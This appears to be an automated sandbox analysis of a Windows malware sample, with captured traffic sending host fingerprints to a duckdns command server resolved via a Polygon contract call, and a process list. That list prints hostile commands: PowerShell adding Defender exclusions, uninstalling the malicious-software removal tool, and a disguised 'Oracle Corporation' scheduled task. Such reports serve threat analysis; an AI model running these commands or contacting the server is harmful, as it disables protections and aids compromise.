                                    Jan 12, 2025 17:38:53.231898069 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:38:53 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=93
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:38:54.954823971 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 235
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:38:54.955024958 CET235OUTData Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 34 31 37 30 30 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c
                                    Data Ascii: {"computername":"141700","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"ZFSWM","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"No Title"}
                                    Jan 12, 2025 17:38:55.326200008 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:38:55 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=92
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:38:56.989052057 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:38:56.989339113 CET270OUTData Raw: 7b 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 31 34 31 37 30 30 22 2c 22 63 6f 72 65 73 22 3a 34 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c
                                    Data Ascii: {"computername":"141700","cores":4,"cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","gpu":"ZFSWM","ip":"","os":"Microsoft Windows 10 Pro","ram":"8191","status":"2","username":"user","version":"3.4.3","vram":"0","windowTitle":"Program Manager |
                                    Jan 12, 2025 17:38:57.356446028 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:38:57 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=91
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:38:59.352034092 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:38:59.567553043 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:38:59 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=90
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:39:01.303641081 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:39:01.675405979 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:39:01 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=89
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:39:04.713134050 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:39:05.082638025 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:39:04 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=88
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:39:06.945420980 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:39:07.318682909 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:39:07 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=87
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:39:09.196762085 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:39:09.565880060 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:39:09 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=86
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:39:10.702435970 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:39:09 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=86
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:39:10.702502966 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:39:09 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=86
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:39:11.983525038 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:39:12.354258060 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:39:12 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=85
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:39:15.086321115 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:39:15.336731911 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:39:15 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=84
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:39:18.202239990 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 235
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:39:18.575197935 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:39:18 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=83
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:39:21.229813099 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:39:21.601856947 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:39:21 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=82
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:39:24.564680099 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:39:24.934196949 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:39:24 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=81
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:39:27.656596899 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:39:28.025451899 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:39:27 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=80
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:39:30.870609045 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:39:31.242050886 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:39:30 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=79
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:39:34.035517931 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:39:34.408330917 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:39:34 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=78
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:39:37.069493055 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:39:37.441191912 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:39:37 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=77
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:39:39.883645058 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:39:40.168404102 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:39:40 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=76
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:39:42.467192888 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:39:42.681922913 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:39:42 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=75
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:39:45.304141045 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:39:45.673830032 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:39:45 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=74
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:39:48.381927013 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 235
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:39:48.602425098 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:39:48 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=73
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:39:51.222837925 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:39:51.594625950 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:39:51 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=72
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:39:54.243062973 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:39:54.613835096 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:39:54 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=71
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:39:57.271044970 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:39:57.642462015 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:39:57 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=70
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:40:00.363336086 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:40:00.586632967 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:40:00 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=69
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:40:03.191436052 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:40:03.563396931 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:40:03 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=68
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:40:06.121020079 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:40:06.489887953 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:40:06 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=67
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:40:09.435264111 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:40:09.826176882 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:40:09 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=66
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:40:12.363176107 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 235
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:40:12.586406946 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:40:12 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=65
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8
                                    Jan 12, 2025 17:40:15.413937092 CET208OUTPOST /api/point.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/json
                                    User-Agent: :\Users\user\AppData\Local\Temp\uteugvdfldgq.xml
                                    Content-Length: 270
                                    Host: blockchainlegion.duckdns.org
                                    Jan 12, 2025 17:40:15.786204100 CET202INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:40:15 GMT
                                    Server: Apache/2.4.52 (Ubuntu)
                                    Content-Length: 0
                                    Keep-Alive: timeout=5, max=64
                                    Connection: Keep-Alive
                                    Content-Type: text/plain;charset=UTF-8


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.449731173.244.207.294437720C:\Windows\System32\conhost.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-12 16:38:28 UTC120OUTPOST / HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: WinHTTP Example/1.0
                                    Content-Length: 136
                                    Host: polygon-rpc.com
                                    2025-01-12 16:38:28 UTC136OUTData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 65 74 68 5f 63 61 6c 6c 22 2c 22 70 61 72 61 6d 73 22 3a 5b 7b 22 74 6f 22 3a 22 30 78 37 35 63 44 32 35 37 39 31 41 36 30 61 62 33 34 35 31 45 32 64 32 66 65 42 35 65 63 34 36 63 36 66 35 34 31 43 32 42 38 22 2c 22 64 61 74 61 22 3a 22 30 78 62 36 38 64 31 38 30 39 22 7d 2c 22 6c 61 74 65 73 74 22 5d 2c 22 69 64 22 3a 31 7d
                                    Data Ascii: {"jsonrpc":"2.0","method":"eth_call","params":[{"to":"0x75cD25791A60ab3451E2d2feB5ec46c6f541C2B8","data":"0xb68d1809"},"latest"],"id":1}
                                    2025-01-12 16:38:28 UTC520INHTTP/1.1 200 OK
                                    Date: Sun, 12 Jan 2025 16:38:28 GMT
                                    Content-Type: application/json
                                    Content-Length: 294
                                    Connection: close
                                    Strict-Transport-Security: max-age=15724800; includeSubDomains
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Credentials: true
                                    Access-Control-Allow-Methods: GET, PUT, POST, DELETE, PATCH, OPTIONS
                                    Access-Control-Allow-Headers: DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization,solana-client
                                    Access-Control-Max-Age: 1728000
                                    2025-01-12 16:38:28 UTC294INData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 72 65 73 75 6c 74 22 3a 22 30 78 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 33 31 36 38 37 34 37 34 37 30 33 61 32 66 32 66 36 32 36 63 36 66 36 33 36 62 36 33 36 38 36 31 36 39 36 65 36 63 36 35 36 37 36 39 36 66 36 65 32 65 36 34 37 35 36 33 36 62 36 34 36 65 37 33 32 65 36 66 37 32 36 37 32 66 36 31 37 30 36 39 32 66 37 30 36 66 36 39 36 65 37 34 32
                                    Data Ascii: {"id":1,"jsonrpc":"2.0","result":"0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000031687474703a2f2f626c6f636b636861696e6c6567696f6e2e6475636b646e732e6f72672f6170692f706f696e742


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:11:38:12
                                    Start date:12/01/2025
                                    Path:C:\Users\user\Desktop\sE5IdDeTp2.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\sE5IdDeTp2.exe"
                                    Imagebase:0x7ff6099b0000
                                    File size:1'245'320 bytes
                                    MD5 hash:DD36F6F79E68D5E54C75527DB2DA97AD
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:1
                                    Start time:11:38:13
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:2
                                    Start time:11:38:13
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:11:38:22
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                    Imagebase:0x7ff702490000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:11:38:22
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\schtasks.exe /delete /f /tn "Oracle Corporation"
                                    Imagebase:0x7ff76f990000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:11:38:22
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:11:38:22
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:8
                                    Start time:11:38:22
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\wusa.exe
                                    Wow64 process (32bit):false
                                    Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                    Imagebase:0x7ff765a80000
                                    File size:345'088 bytes
                                    MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:9
                                    Start time:11:38:22
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
                                    Imagebase:0x7ff76f990000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:10
                                    Start time:11:38:22
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:11
                                    Start time:11:38:22
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\schtasks.exe /run /tn "Oracle Corporation"
                                    Imagebase:0x7ff76f990000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:12
                                    Start time:11:38:22
                                    Start date:12/01/2025
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
